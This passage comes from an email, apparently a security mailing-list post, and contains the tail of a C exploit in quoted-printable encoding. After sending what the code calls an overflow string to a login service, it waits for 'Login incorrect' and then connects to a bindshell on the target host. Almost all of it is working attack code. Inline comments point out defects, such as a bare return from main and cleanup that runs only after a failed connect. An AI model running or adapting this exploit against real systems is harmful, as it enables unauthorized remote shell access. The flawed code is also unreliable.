                	memset(in, 0, sizeof(in));=0A=
                        fprintf(stdout, "read Password: \nsending enter =
now\n");=0A=
=0A=
                	/* empty password: just the newline in ret[] */
                	if(write(fd, ret, strlen(ret)) < 0)=0A=
     				die("Write failed on password");=0A=
=0A=
                        fprintf(stdout, "Sent overflow string.... =
waiting for Login incorrect\n");=0A=
			/* same scan again, this time for "correct" (Login incorrect) */
			while (!strstr(ptr, "correct")) {=0A=
                                 if(ptr=3D=3D&in[0]) {=0A=
                                         memset(in, 0, sizeof(in));=0A=
                                         if(read(fd, in, sizeof(in)-2) < =
0)=0A=
                                                die("Failed read waiting =
for Login Incorrect ");=0A=
                                 }=0A=
                                 for(;ptr < &in[sizeof(in)-1] && ptr[0] =
!=3D 0; ptr++);=0A=
                                 if( ptr=3D=3D&in[sizeof(in)-2] || =
(ptr[0]=3D=3D0 && ptr[1]=3D=3D0))=0A=
                                     ptr =3D &in[0];=0A=
                                 else=0A=
                                     ptr++;=0A=
                                 =0A=
                        }        =0A=
                        fprintf(stdout, "Got it!\n");=0A=
                        fprintf(stdout, "lets connect to our =
bindshell..\n");=0A=
=0A=
			/* connect_shell() only returns -1 (failure); on success it exit()s,
			 * so close(fd) below runs only after a failed connect */
			close(connect_shell(host, remp));=0A=
			=0A=
                	close(fd);=0A=
        	}=0A=
		if(!bf) return;=0A=
	}=0A=
   	fprintf(stderr, "connection closed.\n");=0A=
=0A=
        /* bare return from int main */
        return;=0A=
}=0A=

--Boundary_(ID_54LyeLazkc1drFz5LNeQ7g)--
